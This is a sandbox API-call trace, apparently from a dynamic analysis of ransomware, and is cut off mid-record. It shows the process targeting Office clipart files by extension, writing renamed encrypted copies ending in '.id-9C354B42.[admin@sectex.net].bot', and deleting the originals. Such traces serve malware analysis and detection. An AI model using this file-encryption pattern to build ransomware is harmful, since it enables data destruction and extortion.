	[0156.462] WriteFile (in: hFile=0x3c0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x1720, lpOverlapped=0x0) returned 1
	[0156.463] ReadFile (in: hFile=0x3e0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.463] WriteFile (in: hFile=0x3c0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.463] SetEndOfFile (hFile=0x3c0) returned 1
	[0156.463] CloseHandle (hObject=0x3c0) returned 1
	[0156.463] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.463] SetEndOfFile (hFile=0x3e0) returned 1
	[0156.465] CloseHandle (hObject=0x3e0) returned 1
	[0156.465] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.466] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105266.wmf")) returned 1
	[0156.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.466] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.466] lstrlenW (lpString=".doc") returned 4
	[0156.466] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.466] lstrlenW (lpString=".docx") returned 5
	[0156.466] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0156.466] lstrlenW (lpString=".pdf") returned 4
	[0156.466] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.466] lstrlenW (lpString=".xls") returned 4
	[0156.466] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.466] lstrlenW (lpString=".xlsx") returned 5
	[0156.466] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0156.467] lstrlenW (lpString=".ppt") returned 4
	[0156.467] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.467] lstrlenW (lpString=".zip") returned 4
	[0156.467] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.467] lstrlenW (lpString=".rar") returned 4
	[0156.467] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.467] lstrlenW (lpString=".bz2") returned 4
	[0156.467] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.467] lstrlenW (lpString=".7z") returned 3
	[0156.467] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.467] lstrlenW (lpString=".dbf") returned 4
	[0156.467] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.467] lstrlenW (lpString=".1cd") returned 4
	[0156.467] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.467] lstrlenW (lpString=".jpg") returned 4
	[0156.467] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.467] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.467] lstrlenW (lpString=".doc") returned 4
	[0156.467] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.467] lstrlenW (lpString=".docx") returned 5
	[0156.467] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0156.467] lstrlenW (lpString=".pdf") returned 4
	[0156.467] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.467] lstrlenW (lpString=".xls") returned 4
	[0156.467] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.468] lstrlenW (lpString=".xlsx") returned 5
	[0156.468] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0156.468] lstrlenW (lpString=".ppt") returned 4
	[0156.468] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.468] lstrlenW (lpString=".zip") returned 4
	[0156.468] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.468] lstrlenW (lpString=".rar") returned 4
	[0156.468] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.468] lstrlenW (lpString=".bz2") returned 4
	[0156.468] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.468] lstrlenW (lpString=".7z") returned 3
	[0156.468] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.468] lstrlenW (lpString=".dbf") returned 4
	[0156.468] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.468] lstrlenW (lpString=".1cd") returned 4
	[0156.468] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.468] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105266.WMF") returned 63
	[0156.468] lstrlenW (lpString=".jpg") returned 4
	[0156.468] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.468] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.468] lstrlenW (lpString="J0105272.WMF") returned 12
	[0156.468] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105272.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.470] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=17728) returned 1
	[0156.470] CloseHandle (hObject=0x3e0) returned 1
	[0156.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105272.wmf")) returned 0x20
	[0156.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105272.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105272.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.471] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.471] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105272.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0156.472] GetLastError () returned 0x0
	[0156.472] ReadFile (in: hFile=0x3e0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4540, lpOverlapped=0x0) returned 1
	[0156.474] WriteFile (in: hFile=0x3c0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4550, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4550, lpOverlapped=0x0) returned 1
	[0156.475] ReadFile (in: hFile=0x3e0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.475] WriteFile (in: hFile=0x3c0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.475] SetEndOfFile (hFile=0x3c0) returned 1
	[0156.475] CloseHandle (hObject=0x3c0) returned 1
	[0156.476] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.476] SetEndOfFile (hFile=0x3e0) returned 1
	[0156.478] CloseHandle (hObject=0x3e0) returned 1
	[0156.478] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.478] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105272.wmf")) returned 1
	[0156.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.479] lstrlenW (lpString=".doc") returned 4
	[0156.479] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.479] lstrlenW (lpString=".docx") returned 5
	[0156.479] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0156.479] lstrlenW (lpString=".pdf") returned 4
	[0156.479] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.479] lstrlenW (lpString=".xls") returned 4
	[0156.479] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.479] lstrlenW (lpString=".xlsx") returned 5
	[0156.479] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0156.479] lstrlenW (lpString=".ppt") returned 4
	[0156.479] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.479] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.479] lstrlenW (lpString=".zip") returned 4
	[0156.479] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.479] lstrlenW (lpString=".rar") returned 4
	[0156.479] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.479] lstrlenW (lpString=".bz2") returned 4
	[0156.479] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.479] lstrlenW (lpString=".7z") returned 3
	[0156.479] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.480] lstrlenW (lpString=".dbf") returned 4
	[0156.480] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.480] lstrlenW (lpString=".1cd") returned 4
	[0156.480] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.480] lstrlenW (lpString=".jpg") returned 4
	[0156.480] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.480] lstrlenW (lpString=".doc") returned 4
	[0156.480] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.480] lstrlenW (lpString=".docx") returned 5
	[0156.480] lstrcmpiW (lpString1=".docx", lpString2="2.WMF") returned -1
	[0156.480] lstrlenW (lpString=".pdf") returned 4
	[0156.480] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.480] lstrlenW (lpString=".xls") returned 4
	[0156.480] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.480] lstrlenW (lpString=".xlsx") returned 5
	[0156.480] lstrcmpiW (lpString1=".xlsx", lpString2="2.WMF") returned -1
	[0156.480] lstrlenW (lpString=".ppt") returned 4
	[0156.480] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.480] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.480] lstrlenW (lpString=".zip") returned 4
	[0156.480] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.480] lstrlenW (lpString=".rar") returned 4
	[0156.480] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.480] lstrlenW (lpString=".bz2") returned 4
	[0156.480] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.480] lstrlenW (lpString=".7z") returned 3
	[0156.481] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.481] lstrlenW (lpString=".dbf") returned 4
	[0156.481] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.481] lstrlenW (lpString=".1cd") returned 4
	[0156.481] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.481] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105272.WMF") returned 63
	[0156.481] lstrlenW (lpString=".jpg") returned 4
	[0156.481] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.481] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.481] lstrlenW (lpString="J0105276.WMF") returned 12
	[0156.481] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105276.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.482] GetFileSizeEx (in: hFile=0x3e0, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=19240) returned 1
	[0156.482] CloseHandle (hObject=0x3e0) returned 1
	[0156.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105276.wmf")) returned 0x20
	[0156.482] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105276.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0156.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105276.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3e0
	[0156.482] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.482] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.482] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105276.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0156.483] GetLastError () returned 0x0
	[0156.483] ReadFile (in: hFile=0x3e0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x4b28, lpOverlapped=0x0) returned 1
	[0156.485] WriteFile (in: hFile=0x3c0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x4b30, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x4b30, lpOverlapped=0x0) returned 1
	[0156.486] ReadFile (in: hFile=0x3e0, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0156.486] WriteFile (in: hFile=0x3c0, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0156.486] SetEndOfFile (hFile=0x3c0) returned 1
	[0156.486] CloseHandle (hObject=0x3c0) returned 1
	[0156.486] SetFilePointerEx (in: hFile=0x3e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0156.486] SetEndOfFile (hFile=0x3e0) returned 1
	[0156.489] CloseHandle (hObject=0x3e0) returned 1
	[0156.489] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0156.490] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105276.wmf")) returned 1
	[0156.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.490] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.490] lstrlenW (lpString=".doc") returned 4
	[0156.490] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.490] lstrlenW (lpString=".docx") returned 5
	[0156.490] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0156.490] lstrlenW (lpString=".pdf") returned 4
	[0156.490] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.490] lstrlenW (lpString=".xls") returned 4
	[0156.490] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.491] lstrlenW (lpString=".xlsx") returned 5
	[0156.491] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0156.491] lstrlenW (lpString=".ppt") returned 4
	[0156.491] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.491] lstrlenW (lpString=".zip") returned 4
	[0156.491] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.491] lstrlenW (lpString=".rar") returned 4
	[0156.491] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.491] lstrlenW (lpString=".bz2") returned 4
	[0156.491] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.491] lstrlenW (lpString=".7z") returned 3
	[0156.491] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.491] lstrlenW (lpString=".dbf") returned 4
	[0156.491] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.491] lstrlenW (lpString=".1cd") returned 4
	[0156.491] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.491] lstrlenW (lpString=".jpg") returned 4
	[0156.491] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.491] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.491] lstrlenW (lpString=".doc") returned 4
	[0156.492] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0156.492] lstrlenW (lpString=".docx") returned 5
	[0156.492] lstrcmpiW (lpString1=".docx", lpString2="6.WMF") returned -1
	[0156.492] lstrlenW (lpString=".pdf") returned 4
	[0156.492] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0156.492] lstrlenW (lpString=".xls") returned 4
	[0156.492] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0156.492] lstrlenW (lpString=".xlsx") returned 5
	[0156.492] lstrcmpiW (lpString1=".xlsx", lpString2="6.WMF") returned -1
	[0156.492] lstrlenW (lpString=".ppt") returned 4
	[0156.492] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0156.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.492] lstrlenW (lpString=".zip") returned 4
	[0156.492] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0156.492] lstrlenW (lpString=".rar") returned 4
	[0156.492] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0156.492] lstrlenW (lpString=".bz2") returned 4
	[0156.492] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0156.492] lstrlenW (lpString=".7z") returned 3
	[0156.492] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0156.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.492] lstrlenW (lpString=".dbf") returned 4
	[0156.492] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0156.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.492] lstrlenW (lpString=".1cd") returned 4
	[0156.492] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0156.492] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105276.WMF") returned 63
	[0156.492] lstrlenW (lpString=".jpg") returned 4
	[0156.492] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0156.493] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0156.493] lstrlenW (lpString="J0105280.WMF") returned 12
	[0156.493] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105280.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x388
	[0156.718] GetFileSizeEx (in: hFile=0x388, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=11540) returned 1
	[0156.718] CloseHandle (hObject=0x388) returned 1
	[0156.718] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105280.wmf")) returned 0x20
	[0156.871] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105280.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0157.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105280.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0157.757] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.757] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0157.757] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105280.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105280.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0157.758] GetLastError () returned 0x0
	[0157.758] ReadFile (in: hFile=0x3c4, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x2d14, lpOverlapped=0x0) returned 1
	[0157.769] WriteFile (in: hFile=0x268, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x2d20, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x2d20, lpOverlapped=0x0) returned 1
